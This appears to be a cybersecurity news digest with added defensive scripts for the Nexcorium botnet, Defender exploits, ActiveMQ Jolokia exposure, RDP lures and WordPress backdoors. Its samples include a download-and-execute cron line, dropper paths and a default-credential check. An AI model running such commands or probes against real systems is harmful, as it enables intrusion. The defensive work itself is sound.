NewsDigest

Nexcorium Mirai Variant Hijacks TBK DVRs

🏷️ Cybersecurity · 🔗 3 sources · Digest Score 11 (the score reflects the story's reliability, bias neutrality, and public momentum)

📰 Full Story

Security vendors on April 18, 2026, warned of a new Mirai-family botnet called Nexcorium that exploits a command-injection flaw (CVE-2024-3721) in TBK DVR models, primarily the DVR-4104 and DVR-4216, to build large-scale DDoS botnets. Fortinet FortiGuard Labs and other researchers found attackers delivering a downloader script that fetches payloads built for several architectures (ARM, MIPS, x86-64) and then establishes persistence through modifications to /etc/inittab, /etc/rc.local, systemd services and cron jobs. Nexcorium embeds XOR-encoded configuration data, supports multiple flood types (UDP, TCP SYN/ACK, SMTP and others), carries a list of Telnet credentials for brute-forcing further devices, and reuses older exploits such as CVE-2017-17215 to broaden its reach. Unit 42 and others also observed scans targeting end-of-life TP-Link routers; CISA had previously listed related flaws in its Known Exploited Vulnerabilities catalogue. Researchers note the campaign bears markers referencing a so-called "Nexus Team." Organisations are advised to patch or decommission vulnerable devices, remove default credentials, segment device networks and monitor for abnormal outbound connections to known C2 domains.
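The persistence locations named above are the first place to look on a suspect Linux or embedded host. The following audit script is an example added to this digest, not code from Fortinet or any of the cited researchers: it walks the same files (/etc/inittab, /etc/rc.local, systemd units, cron drop-ins) and flags the generic dropper idioms a Mirai-family loader leaves behind. The patterns are my assumptions about what such entries look like, not published Nexcorium indicators, and the sample file contents are constructed.

```python
"""Audit common Linux persistence locations for entries typical of a Mirai-family
dropper: loaders launched from world-writable directories, download-and-execute
one-liners, freshly chmod'ed binaries. Example code added to this digest; the
patterns are generic assumptions, not indicators published for Nexcorium."""
import re

# A systemd unit or cron file can carry any name, so the audit takes a mapping of
# path -> content (from disk via load_from_disk, or constructed as in SAMPLE below).
PERSISTENCE_DIRS = ("/etc/systemd/system/", "/etc/cron.d/", "/var/spool/cron/")
PERSISTENCE_FILES = ("/etc/inittab", "/etc/rc.local")

SUSPICIOUS = [
    (re.compile(r"/(tmp|dev/shm|var/tmp)/\S+"), "executes from a world-writable directory"),
    (re.compile(r"\b(wget|curl|tftp)\b.*\|\s*(sh|bash)\b"), "download-and-execute pipeline"),
    (re.compile(r"\bchmod\s+\+?[0-7]*x"), "marks a freshly dropped file executable"),
    (re.compile(r"\b(nohup|setsid)\b.*&\s*$"), "detaches a background process"),
]

def audit(files: dict) -> list:
    """Return (path, line, reason) triples for every suspicious non-comment line."""
    findings = []
    for path, content in files.items():
        if not (path in PERSISTENCE_FILES or path.startswith(PERSISTENCE_DIRS)):
            continue
        for line in content.splitlines():
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            for pattern, reason in SUSPICIOUS:
                if pattern.search(stripped):
                    findings.append((path, stripped, reason))
                    break
    return findings

def load_from_disk() -> dict:
    """Collect the same files from a live host (run as root; absent paths are skipped)."""
    import glob, os
    files = {}
    candidates = list(PERSISTENCE_FILES)
    for d in PERSISTENCE_DIRS:
        candidates.extend(glob.glob(d + "*"))
    for p in candidates:
        if os.path.isfile(p):
            try:
                with open(p, errors="replace") as fh:
                    files[p] = fh.read()
            except OSError:
                pass
    return files

# Constructed sample: a clean rc.local plus a cron drop-in, a systemd unit and an
# inittab line that re-launch a loader from /tmp or /dev/shm.
SAMPLE = {
    "/etc/rc.local": "#!/bin/sh\n/usr/sbin/ntpd -g\nexit 0\n",
    "/etc/cron.d/.x": "*/5 * * * * root curl -s http://198.51.100.7/bins.sh | sh\n",
    "/etc/systemd/system/net-monitor.service":
        "[Service]\nExecStart=/tmp/.a/arm7 -d\nRestart=always\n[Install]\nWantedBy=multi-user.target\n",
    "/etc/inittab": "::sysinit:/etc/init.d/rcS\n::respawn:/dev/shm/.m/x86_64\n",
}

if __name__ == "__main__":
    for path, line, reason in audit(SAMPLE):
        print(f"{path}: {reason}: {line}")
```

Run `audit(load_from_disk())` on a real host; on a DVR or router without Python, the same regexes can be grepped over the same paths from a rescue shell.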

Scottish man pleads guilty in $8m crypto hack

🏷️ Cybersecurity · 🌍 United States · 🔥 Trending · 🔗 3 sources · Digest Score 7

📰 Full Story

Tyler Robert Buchanan, 24, of Dundee, Scotland, pleaded guilty in the U.S. District Court for the Central District of California to conspiracy to commit wire fraud and aggravated identity theft for his role in a phishing campaign that stole at least $8 million in virtual currency. Prosecutors say Buchanan and co-conspirators ran the scheme from September 2021 to April 2023, sending hundreds of spoofed text messages that directed employees to fraudulent websites and captured their login credentials. Stolen credentials and cryptocurrency seed phrases were reportedly shared on a Telegram channel administered by Buchanan. Court documents say the group targeted telecoms, IT suppliers, cloud communications firms, virtual asset companies and individuals, impacting at least a dozen companies and, in some filings, as many as 45 victims across the United States, Canada, India and the United Kingdom. Police Scotland assisted the FBI. Buchanan has been in U.S. custody since April 2025 and faces a maximum sentence of 22 years at a sentencing hearing set for Aug. 21. Several alleged co-conspirators remain charged in U.S. courts; one has already pleaded guilty and been sentenced.

Supreme Court hacker sentenced to probation

🏷️ Cybersecurity · 🌍 United States · 🔗 4 sources · Digest Score 7

📰 Full Story

Nicholas Moore, a 25-year-old Tennessee man who admitted repeatedly accessing the U.S. Supreme Court's electronic filing system and the networks of AmeriCorps and the Department of Veterans Affairs, was sentenced to 12 months of probation on April 17, 2026. Moore pleaded guilty in January to a misdemeanor count of fraud and related activity in connection with computers, admitting he used stolen login credentials to view and sometimes post victims' personal information to an Instagram account called @ihackedthegovernment. Prosecutors said he accessed the Supreme Court e-filing account on more than 25 days in 2023 and revealed details from other federal systems, including phone numbers and medical data, and reported no financial losses. The Justice Department recommended probation rather than incarceration, characterizing Moore as a "vulnerable young man" with long-term disabilities; prosecutors had sought up to 36 months of probation while the defense sought 12 months. U.S. District Judge Beryl Howell imposed the 12-month probation term and ordered neither prison time nor fines.

Three Microsoft Defender zero-days exploited in wild

🏷️ Cybersecurity · 🔥 Trending · 🔗 12 sources · Digest Score 4

📰 Full Story

Security researchers and vendors warn that proof-of-concept exploits for three Microsoft Defender vulnerabilities, nicknamed BlueHammer, RedSun and UnDefend, are public and being weaponized in real-world attacks. The exploits were released on GitHub by a researcher using the aliases Chaotic Eclipse / Nightmare-Eclipse after a dispute with Microsoft's Security Response Center. BlueHammer (tracked as CVE-2026-33825) was publicly released in early April and patched by Microsoft in the April Patch Tuesday updates; Huntress reported BlueHammer exploitation beginning April 10. RedSun and UnDefend were published mid-April and, as of April 16–18 reporting, remained unpatched. RedSun's PoC achieves local privilege escalation to SYSTEM by abusing Defender's cloud-file handling to overwrite protected binaries; UnDefend lets a standard user block Defender signature updates, degrading protection. Vendors have observed attacker activity consistent with hands-on-keyboard post-exploitation (for example whoami /priv, cmdkey /list and net group). Microsoft says it supports coordinated disclosure. Security teams are urged to apply available updates, monitor endpoint telemetry for suspicious local executable activity and known IOC patterns, and isolate affected hosts while emergency mitigations and patches are developed.

🤝 Social Media Insights

Social Summary
Vendors observed real-world use of PoC exploits that weaponize Defender: RedSun overwrites protected binaries to gain SYSTEM, and UnDefend blocks updates to weaken detection. Observed exploitation began April 10 and used a compromised SSLVPN; apply patches, monitor telemetry and layer defenses.
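The discovery commands the vendors mention (whoami /priv, cmdkey /list, net group) are individually noisy but rarely run together within a minute or two on a workstation, and after a successful RedSun-style escalation they run as SYSTEM. The detection below is an example added to this digest, not a vendor rule: it clusters those commands per host inside a short window over constructed process-creation records. The window, the threshold and the two extra commands beyond the three named in the story are assumptions to tune per environment.

```python
"""Flag hosts where privilege/credential discovery commands cluster in a short
window, the post-exploitation pattern reported after the Defender exploits.
Example detection added to this digest, run over constructed process-creation
records; window, threshold and the extra commands are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# Executable name and the argument that makes the command a discovery step.
RECON = {
    "whoami_priv": ("whoami", "/priv"),
    "cmdkey_list": ("cmdkey", "/list"),
    "net_group":   ("net", "group"),
    "net_user":    ("net", "user"),      # assumed companion command
    "nltest_dc":   ("nltest", "/dclist"),  # assumed companion command
}

def classify(cmdline: str):
    """Return the recon label for a command line, or None if it is not one."""
    tokens = cmdline.lower().replace('"', "").split()
    if not tokens:
        return None
    exe = tokens[0].rsplit("\\", 1)[-1].removesuffix(".exe")
    for label, (name, arg) in RECON.items():
        if exe == name and arg in tokens[1:]:
            return label
    return None

def detect(events, window=timedelta(minutes=10), min_distinct=2):
    """events: iterable of dicts with ts (ISO 8601), host, user, cmdline.
    Returns one alert per host whose distinct recon commands within `window`
    reach `min_distinct`, listing the commands and the account that ran them."""
    by_host = defaultdict(list)
    for e in events:
        label = classify(e["cmdline"])
        if label:
            by_host[e["host"]].append((datetime.fromisoformat(e["ts"]), label, e["user"]))
    alerts = []
    for host, hits in by_host.items():
        hits.sort()
        for i, (t0, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - t0 <= window]
            labels = {h[1] for h in in_window}
            if len(labels) >= min_distinct:
                alerts.append({"host": host, "user": in_window[0][2],
                               "first": t0.isoformat(), "commands": sorted(labels)})
                break
    return alerts

# Constructed telemetry: WS-17 shows the cluster running as SYSTEM; WS-22 has a lone
# whoami from an ordinary user, which should stay below the threshold.
SAMPLE_EVENTS = [
    {"ts": "2026-04-16T09:02:11", "host": "WS-17", "user": "NT AUTHORITY\\SYSTEM", "cmdline": "whoami /priv"},
    {"ts": "2026-04-16T09:02:40", "host": "WS-17", "user": "NT AUTHORITY\\SYSTEM", "cmdline": "C:\\Windows\\System32\\cmdkey.exe /list"},
    {"ts": "2026-04-16T09:03:05", "host": "WS-17", "user": "NT AUTHORITY\\SYSTEM", "cmdline": "net group \"Domain Admins\" /domain"},
    {"ts": "2026-04-16T09:10:00", "host": "WS-17", "user": "CORP\\jdoe", "cmdline": "notepad.exe report.txt"},
    {"ts": "2026-04-16T11:45:00", "host": "WS-22", "user": "CORP\\asmith", "cmdline": "whoami /priv"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Feed it Sysmon Event ID 1 or Security 4688 records (with command-line auditing enabled) mapped to the four fields; an alert whose user is SYSTEM on a workstation deserves immediate isolation.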

CISA orders patches for Apache ActiveMQ bug

🏷️ Cybersecurity · 🌍 United States · 🔗 3 sources · Digest Score 4

📰 Full Story

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a high‑severity Apache ActiveMQ vulnerability, CVE-2026-34197, to its Known Exploited Vulnerabilities (KEV) list on April 16–17, 2026, citing confirmed active exploitation. The flaw, described as improper input validation in ActiveMQ’s Jolokia management API, can enable remote code execution by convincing the broker to fetch remote configuration and run OS commands. Researcher Naveen Sunkavally of Horizon3 said the bug had been present in the codebase for about 13 years and was discovered with assistance from an AI tool. CISA’s KEV listing triggered Binding Operational Directive 22-01, giving federal civilian agencies until April 30, 2026 to patch or explain mitigation steps. Apache has issued fixes; administrators are urged to apply the vendor updates for the 5.19.x and 6.2.x series, audit externally reachable Jolokia endpoints, disable or restrict Jolokia where unnecessary, remove default credentials and monitor for signs of compromise. Security firms report thousands of exposed ActiveMQ instances and evidence of scans and exploitation attempts in the wild.
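"Audit externally reachable Jolokia endpoints" is the actionable line in that advisory. The checker below is an example added to this digest, not Apache's or CISA's tooling: it asks each broker's web console for Jolokia's read-only version document and reports whether the API answers anonymously, only with the console's shipped admin/admin credentials, or only with real credentials. It never sends a Jolokia exec request. The /api/jolokia path is the ActiveMQ 5.x default and is an assumption for other deployments; the HTTP client is injectable so the sample run uses canned responses instead of the network.

```python
"""Classify ActiveMQ brokers by how exposed their Jolokia management API is.
Example added to this digest; read-only probe, no exec calls. The endpoint path
and shipped credentials are the ActiveMQ 5.x defaults (assumption elsewhere)."""
import base64, json, urllib.error, urllib.request

JOLOKIA_PATHS = ("/api/jolokia/version",)   # default web-console mount; adjust per deployment
DEFAULT_CREDS = ("admin", "admin")           # conf/jetty-realm.properties as shipped

def http_get(url, auth=None, timeout=5):
    """Real fetch: returns (status, body); (None, '') when the host is unreachable."""
    req = urllib.request.Request(url)
    if auth:
        token = base64.b64encode(f"{auth[0]}:{auth[1]}".encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""

def agent_version(body: str):
    """Jolokia's version document carries the agent version under 'value'."""
    try:
        return json.loads(body).get("value", {}).get("agent")
    except (ValueError, AttributeError):
        return None

def check_jolokia(base_url: str, fetch=http_get) -> dict:
    """State is one of: open (no auth), default-creds, auth-required, closed."""
    for path in JOLOKIA_PATHS:
        url = base_url.rstrip("/") + path
        status, body = fetch(url)
        if status is None or status == 404:
            continue
        if status == 200 and agent_version(body):
            return {"url": url, "state": "open", "agent": agent_version(body)}
        if status in (401, 403):
            status2, body2 = fetch(url, auth=DEFAULT_CREDS)
            if status2 == 200 and agent_version(body2):
                return {"url": url, "state": "default-creds", "agent": agent_version(body2)}
            return {"url": url, "state": "auth-required", "agent": None}
    return {"url": base_url, "state": "closed", "agent": None}

# Constructed responses standing in for four brokers; broker-c is unreachable.
CANNED = {
    "http://broker-a:8161/api/jolokia/version": (200, '{"value":{"agent":"1.7.1","protocol":"7.2"},"status":200}'),
    "http://broker-b:8161/api/jolokia/version": (401, ""),
    "http://broker-d:8161/api/jolokia/version": (403, ""),
}

def stub_fetch(url, auth=None, timeout=5):
    status, body = CANNED.get(url, (None, ""))
    if status == 401 and auth == DEFAULT_CREDS:     # broker-b still uses admin/admin
        return 200, '{"value":{"agent":"1.7.1"},"status":200}'
    return status, body

if __name__ == "__main__":
    for host in ("broker-a", "broker-b", "broker-c", "broker-d"):
        print(check_jolokia(f"http://{host}:8161", stub_fetch))
```

Anything reporting "open" or "default-creds" from outside the broker's management network is the exposure the advisory describes and should be firewalled or have the console disabled before the patch window, not after.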

Sanctioned Grinex Exchange Halts After $13–15M Hack

🏷️ Cybersecurity · 🌍 Kyrgyzstan · 🔥 Trending · 🔗 5 sources · Digest Score 4

📰 Full Story

Grinex, a Kyrgyzstan-registered crypto exchange linked to Russia and sanctioned by the U.S., U.K. and EU, suspended operations after suffering a cyber heist that stole roughly 1 billion roubles (about $13.1 million) in mid-April 2026. Blockchain intelligence firms TRM Labs and Elliptic put the value of drained addresses at between $13.7 million and $15 million and identified about 70 linked addresses. Analysts say much of the stolen USDT was rapidly swapped into TRX or ETH to reduce the chance of freezing by Tether. TokenSpot, a separate Kyrgyz exchange with on-chain ties to Grinex, was also disrupted but lost only a small amount. Grinex accused “western intelligence” agencies of orchestrating the attack and said preliminary findings indicate the operation aimed to damage Russia’s financial sovereignty; those claims have not been independently verified. U.S. authorities previously sanctioned Grinex as a rebrand of Garantex, which U.S. Treasury accused of laundering illicit proceeds. Grinex has reported the incident to law enforcement and shared wallet data publicly.

Global police seize 53 DDoS domains in PowerOFF

🏷️ Cybersecurity · 🔥 Trending · 🔗 8 sources · Digest Score 2

📰 Full Story

A coordinated international law enforcement operation led by Europol has seized 53 web domains linked to DDoS-for-hire (“booter”) services and identified more than 3 million user accounts, authorities said. Operation PowerOFF, conducted April 13–16, involved agencies from 21 countries including the United States, United Kingdom, Japan, Germany and Brazil. The action resulted in four arrests, execution of 25 search warrants, seizure of servers and databases, removal of over 100 URLs from search results, and targeted warning ads aimed at potential users. Using data recovered from seized infrastructure, police and partners sent more than 75,000 emails and letters — and posted warnings on blockchain and cryptocurrency channels — to suspected customers of the services. U.S. agencies also seized several domains and infrastructure tied to named booter services. Officials said the takedowns disrupted technical backends that enabled attacks and combined enforcement with prevention measures to deter new users. Europol described DDoS-for-hire as a prolific, low-barrier cybercrime that can be used for harassment, extortion or to knock critical online services offline.

U.S. Sentences Two for North Korea IT Scheme

🏷️ Cybersecurity · 🌍 United States · 🔥 Trending · 🔗 8 sources · Digest Score 2

📰 Full Story

The U.S. Department of Justice on April 15 announced prison terms for two New Jersey men who helped a North Korean government-run operation place remote IT workers inside American companies. Kejia (Tony) Wang, 42, was sentenced to 108 months and Zhenxing (Danny) Wang, 39, to 92 months after pleading guilty to conspiracy charges including wire fraud, money laundering and identity theft. Prosecutors say the men ran or hosted so‑called “laptop farms,” created shell companies and used the stolen identities of at least 80 U.S. residents to secure jobs for North Korean operatives at more than 100 U.S. firms, including Fortune 500 companies and a California-based defense contractor. The scheme generated roughly $5 million for the DPRK and inflicted an estimated $3 million in remediation and legal costs on victim firms; the defendants and co‑facilitators collected about $696,000, of which $600,000 was ordered forfeited. Court filings say one overseas worker accessed export‑controlled data. Authorities continue to seek additional co‑conspirators and have offered rewards for information.

NIST narrows NVD analysis amid CVE surge

🏷️ Cybersecurity · 🌍 United States · 🔥 Trending · 🔗 5 sources · Digest Score 1

📰 Full Story

The U.S. National Institute of Standards and Technology (NIST) said this week it will drastically narrow which Common Vulnerabilities and Exposures (CVE) entries receive detailed analysis — or “enrichment” — in the National Vulnerability Database (NVD). Facing a swelling backlog and a 263% rise in CVE submissions between 2020 and 2025, NIST will prioritize enrichment only for CVEs listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog, flaws affecting software used by the federal government, and defects in “critical software” defined under Executive Order 14028. All CVEs will still be listed, but many will be marked “Not Scheduled” and not receive NIST-authored CVSS scores; the agency will generally accept severity ratings supplied by CVE Numbering Authorities. NIST said it enriched nearly 42,000 CVEs in 2025 and that submissions in early 2026 are roughly one-third higher than a year earlier. The change follows a 2024 funding lapse and an operational strain amplified by AI-driven vulnerability discovery. Users can request case-by-case enrichment via nvd@nist.gov. The agency said the shift buys time to build automated tools and stabilize the NVD program.
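The practical consequence for anyone consuming NVD data is that a CVE may now carry only the CNA's CVSS metric, or none at all, and a pipeline that reads only NIST's "Primary" metric will silently score those entries as unknown. The selector below is an example added to this digest, not NIST code: it follows the NVD API 2.0 record layout (metrics.cvssMetricV31[] entries with source, type and cvssData), prefers the NIST entry, falls back to the CNA entry, and treats an unscored CVE as something to review rather than drop. The sample records are constructed, and the "Not Scheduled" status string is taken from the story rather than from a schema I have checked.

```python
"""Choose a CVSS score from an NVD API 2.0 CVE record, preferring NIST's own
enrichment and falling back to the CNA-supplied metric when there is none.
Example added to this digest; sample records are constructed."""

NIST_SOURCE = "nvd@nist.gov"
METRIC_VERSIONS = ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30")  # newest first

def pick_cvss(cve: dict) -> dict:
    """`cve` is one vulnerabilities[].cve object. Returns score/severity/source,
    whether NIST enriched it, and the record's vulnStatus when nothing scored it."""
    metrics = cve.get("metrics", {})
    for version in METRIC_VERSIONS:
        entries = metrics.get(version, [])
        # NIST's Primary entry sorts first; any CNA (Secondary) entries follow.
        for m in sorted(entries, key=lambda m: m.get("source") != NIST_SOURCE):
            data = m["cvssData"]
            return {
                "score": data["baseScore"],
                "severity": data.get("baseSeverity") or m.get("baseSeverity"),
                "source": m.get("source"),
                "version": version,
                "enriched": m.get("source") == NIST_SOURCE,
                "status": cve.get("vulnStatus"),
            }
    return {"score": None, "severity": None, "source": None, "version": None,
            "enriched": False, "status": cve.get("vulnStatus")}

def triage(records, floor=7.0):
    """IDs needing attention: scored at or above `floor`, or not scored at all.
    An unscored entry is surfaced, never filtered out as if it were low."""
    out = []
    for cve in records:
        r = pick_cvss(cve)
        if r["score"] is None or r["score"] >= floor:
            origin = "nist" if r["enriched"] else (r["source"] or "none")
            out.append((cve["id"], r["score"], origin))
    return out

# Constructed records in the shape returned by /rest/json/cves/2.0.
ENRICHED = {
    "id": "CVE-2026-00001", "vulnStatus": "Analyzed",
    "metrics": {"cvssMetricV31": [
        {"source": "cna@example.org", "type": "Secondary",
         "cvssData": {"baseScore": 9.8, "baseSeverity": "CRITICAL"}},
        {"source": "nvd@nist.gov", "type": "Primary",
         "cvssData": {"baseScore": 8.8, "baseSeverity": "HIGH"}},
    ]},
}
NOT_SCHEDULED = {
    "id": "CVE-2026-00002", "vulnStatus": "Not Scheduled",
    "metrics": {"cvssMetricV31": [
        {"source": "cna@example.org", "type": "Secondary",
         "cvssData": {"baseScore": 7.5, "baseSeverity": "HIGH"}},
    ]},
}
BARE = {"id": "CVE-2026-00003", "vulnStatus": "Not Scheduled", "metrics": {}}

if __name__ == "__main__":
    for row in triage([ENRICHED, NOT_SCHEDULED, BARE]):
        print(row)
```

Record the `origin` column alongside the score in your vulnerability tracker: a CNA score is the vendor's own assessment of its bug, which is useful but not the independent rating NIST used to provide.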

Microsoft strengthens Windows RDP file protections

🏷️ Cybersecurity · 🌍 United States · 🔗 3 sources · Digest Score 1

📰 Full Story

Microsoft has deployed new protections in its April 2026 cumulative updates for Windows 10 and Windows 11 to block a growing phishing vector that abuses Remote Desktop Protocol (.rdp) files. The updates (including KB5082200 for Windows 10 and KB5083769 / KB5082052 for Windows 11) introduce a one‑time educational prompt when users first open an RDP file and then require a security dialog on subsequent opens. That dialog displays whether the file is digitally signed, the remote system address, and lists any requested local resource redirections (drives, clipboard, devices) which are disabled by default until explicitly approved. The protections apply only when RDP files are opened directly, not to connections initiated inside the Remote Desktop client. Administrators can temporarily disable the warnings via a registry policy, and Microsoft warns that file signatures do not guarantee safety. The change responds to real-world abuse — notably by state‑linked groups using rogue RDP files in phishing campaigns — and Microsoft says future updates may deprecate older connection settings.
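The new dialog surfaces exactly the fields a defender wants to see before a user clicks: where the file connects, what it redirects, and whether it is signed. The parser below is an example added to this digest, not Microsoft's code, and reproduces that assessment for a .rdp file received by mail or quarantined by a gateway. It reads the file's `name:type:value` lines and reports the target, the local resources the file asks to redirect, RemoteApp mode and the presence of a signature. The sample file is constructed; the list of redirection settings covers the common ones and is an assumption, not the client's full set.

```python
"""Parse a Remote Desktop (.rdp) file and report what an attacker-supplied one
would get from the victim: target host, redirected local resources, RemoteApp
launch, and whether it carries a publisher signature. Example added to this
digest, not Microsoft's code; the sample is constructed."""

# Setting -> (value type, test for 'enabled', description). A non-empty string on
# the drive/device settings ('*' in practice) exposes everything.
REDIRECTS = {
    "drivestoredirect":     ("s", lambda v: v != "",  "local drives"),
    "devicestoredirect":    ("s", lambda v: v != "",  "plug-and-play devices"),
    "usbdevicestoredirect": ("s", lambda v: v != "",  "USB devices"),
    "redirectclipboard":    ("i", lambda v: v == "1", "clipboard"),
    "redirectprinters":     ("i", lambda v: v == "1", "printers"),
    "redirectsmartcards":   ("i", lambda v: v == "1", "smart cards"),
    "redirectcomports":     ("i", lambda v: v == "1", "COM ports"),
}

def parse_rdp(text: str) -> dict:
    """Return {setting: (type, value)}. Lines that are not name:type:value with a
    known type (s, i, b) are skipped, which is assumed to match the client."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line:
            continue
        parts = line.split(":", 2)          # value may itself contain ':' (host:port)
        if len(parts) != 3 or parts[1] not in ("s", "i", "b"):
            continue
        settings[parts[0].lower()] = (parts[1], parts[2])
    return settings

def assess(text: str) -> dict:
    s = parse_rdp(text)
    redirected = [desc for key, (typ, enabled, desc) in REDIRECTS.items()
                  if key in s and s[key][0] == typ and enabled(s[key][1])]
    # A signature identifies the publisher; it says nothing about the publisher's intent.
    signed = "signature" in s and "signscope" in s and s["signature"][1] != ""
    return {
        "target": s.get("full address", ("s", ""))[1],
        "redirected": redirected,
        "remoteapp": s.get("remoteapplicationmode", ("i", "0"))[1] == "1",
        "remoteapp_program": s.get("remoteapplicationprogram", ("s", ""))[1],
        "signed": signed,
    }

# Constructed sample in the style of a rogue RDP lure: external host, drives and
# devices fully redirected, clipboard on, and a RemoteApp so the session looks
# like a single window rather than a desktop.
SAMPLE = """screen mode id:i:2
full address:s:203.0.113.45:3389
prompt for credentials:i:0
drivestoredirect:s:*
redirectclipboard:i:1
redirectprinters:i:0
devicestoredirect:s:*
remoteapplicationmode:i:1
remoteapplicationprogram:s:||Update
"""

if __name__ == "__main__":
    print(assess(SAMPLE))
```

Files saved by mstsc may be UTF-16 rather than UTF-8, so open a real file with the encoding your gateway reports before passing its text to `assess`. Any file from outside the organisation whose `redirected` list is non-empty is a candidate for blocking regardless of `signed`.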

Sweden says pro-russian group targeted heating plant

🏷️ Cybersecurity · 🌍 Sweden · 🔥 Trending · 🔗 5 sources · Digest Score 1

📰 Full Story

Swedish authorities disclosed on April 15, 2026 that a pro-Russian cyber group with links to Russian intelligence attempted to disrupt operations at a heating plant in western Sweden in spring 2025. Civil Defence Minister Carl-Oskar Bohlin said the attack failed because a built-in protection mechanism prevented serious consequences. The Swedish Security Service (Säpo) identified the actor and later closed its investigation, according to officials. Moscow rejected the allegations. Swedish officials framed the incident as part of a rising wave of hybrid and cyber attacks across Europe since Russia's full-scale invasion of Ukraine in 2022, noting a shift from denial-of-service operations to more sophisticated strikes aimed at the operational technology that controls physical infrastructure. The government linked the episode to similar disruption attempts in Poland, Denmark and Norway that targeted energy, water and transport systems. Authorities have not named the affected facility or released technical details of the intrusion.

Black Basta playbook revived in executive-targeted campaign

🏷️ Cybersecurity · 🔥 Trending · 🔗 4 sources · Digest Score 0

📰 Full Story

Security firm ReliaQuest on April 15, 2026 published research showing a surge in a fast-moving, high-volume intrusion campaign that mirrors the playbook of the defunct Black Basta ransomware group. The campaign, active since at least May 2025 and accelerating in March 2026, has targeted more than 100 employees across dozens of organizations with a heavy focus on senior leadership; roughly three-quarters of observed targets were executives, directors or managers. Attackers combine mass "email bombing" with Microsoft Teams help-desk impersonation to push victims to install remote monitoring and management (RMM) tools such as Supremo or to use Windows Quick Assist. Once connected, operators execute scripts disguised as legitimate utilities to gain hands-on access. ReliaQuest says the activity uses disposable Microsoft tenants, Russia-based source IPs and a highly automated workflow that enables intrusions within minutes. The hardest-hit sectors include manufacturing, professional, scientific and technical services, finance and insurance, construction and technology. While researchers have not yet observed widespread ransomware encryption in the current wave, they warn the activity is consistent with pre-ransomware staging and could lead to data theft, extortion or subsequent ransomware deployment.

Russia-linked hackers breached Ukrainian prosecutors' emails

🏷️ Cybersecurity · 🌍 Ukraine · 🔗 3 sources · Digest Score 0

📰 Full Story

WASHINGTON, April 15, 2026 — Russia-linked hackers compromised more than 170 email accounts belonging to Ukrainian prosecutors and investigators and at least 284 inboxes overall between September 2024 and March 2026, Reuters reported after reviewing data exposed by researchers. The data, left on a server and discovered by Ctrl-Alt-Intel, included logs of successful operations and thousands of stolen emails. Targets included the Specialized Prosecutor's Office in the Field of Defense, the Asset Recovery and Management Agency (ARMA), the Prosecutor’s Training Center and the Specialized Anti-Corruption Prosecutor’s Office (SAPO). Named victims in the dataset included former ARMA head Yaroslava Maksymenko and Prosecutor’s Training Center deputy Oleg Duka. The intrusion also affected entities in neighboring NATO countries and the Balkans — including at least 67 Romanian Air Force accounts and 27 inboxes tied to Greece’s General Staff — and local bodies in occupied areas such as Pokrovsk. Cybersecurity researchers linked the campaign to a Russia-aligned military hacking group commonly called “Fancy Bear,” though some experts urged caution in firm attribution. Ukraine’s CERT has investigated compromises; Moscow did not comment.

Backdoors Found in Dozens of WordPress Plugins

🏷️ Cybersecurity · 🔥 Trending · 🔗 4 sources · Digest Score 0

📰 Full Story

Security researchers disclosed a coordinated supply‑chain attack that placed backdoors into more than 30 WordPress plugins sold under the “Essential Plugin” portfolio. The plugins were bought on the marketplace Flippa by a buyer using the name “Kris” for a six‑figure sum; a malicious PHP deserialization backdoor was introduced in an August 8, 2025 update and remained dormant until it activated on April 5–6, 2026. During the activation window a command‑and‑control service at analytics.essentialplugin.com delivered payloads that injected code into wp-config.php and served cloaked SEO spam and redirects exclusively to Googlebot. WordPress.org permanently closed 31 affected plugins on April 7, 2026, and pushed an update to neutralise the phone‑home mechanism in plugin files, but the injected wp-config.php entries require manual cleanup. Researchers warn the attacker’s C2 resolution used an Ethereum smart contract, complicating domain takedown. The campaign echoes past plugin‑sale compromises and highlights a systemic gap: WordPress currently performs no ownership‑transfer code reviews or mandatory update code signing, leaving hundreds of thousands of sites at risk.
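Because the plugin-side phone-home was neutralised by WordPress.org but the wp-config.php injection was not, site owners need to inspect that file themselves. The scanner below is an example added to this digest, not code from the researchers or from WordPress: it flags loader idioms anywhere in wp-config.php (eval, decoders, unserialize, remote includes, user-agent cloaking) and, separately, any statement after the "That's all, stop editing!" marker that is not one of the stock ABSPATH / wp-settings.php lines, since a clean file has nothing else there. The patterns are general assumptions rather than signatures of this specific backdoor, and the sample config is constructed.

```python
"""Scan a wp-config.php for injected code: loader idioms anywhere in the file and
any statement after the stop-editing marker that WordPress itself would not put
there. Example added to this digest; patterns are general assumptions, not the
Essential Plugin backdoor's signatures, and the sample is constructed."""
import re

MARKER = re.compile(r"/\*\s*That's all, stop editing!")
# The only statements WordPress's own wp-config-sample.php places after the marker.
ALLOWED_TAIL = [
    re.compile(r"^if\s*\(\s*!\s*defined\(\s*'ABSPATH'\s*\)\s*\)\s*\{?$"),
    re.compile(r"^define\(\s*'ABSPATH'"),
    re.compile(r"^\}$"),
    re.compile(r"^require_once\s+ABSPATH\s*\.\s*'wp-settings\.php'\s*;$"),
]
RISKY = [
    (re.compile(r"\beval\s*\("), "eval()"),
    (re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("), "obfuscation decoder"),
    (re.compile(r"\bunserialize\s*\("), "unserialize() of untrusted data"),
    (re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"](https?|ftp)://"), "remote include"),
    (re.compile(r"\b(file_get_contents|curl_init|fsockopen)\s*\(\s*['\"]https?://"), "remote fetch"),
    (re.compile(r"googlebot|HTTP_USER_AGENT", re.I), "user-agent cloaking"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\s*\["), "reads request data"),
]

def is_comment(line: str) -> bool:
    return not line or line.startswith(("//", "#", "/*", "*"))

def scan_wp_config(src: str) -> list:
    """Return sorted (line_no, reason, text); line_no 0 marks a whole-file issue."""
    lines = src.splitlines()
    findings = []
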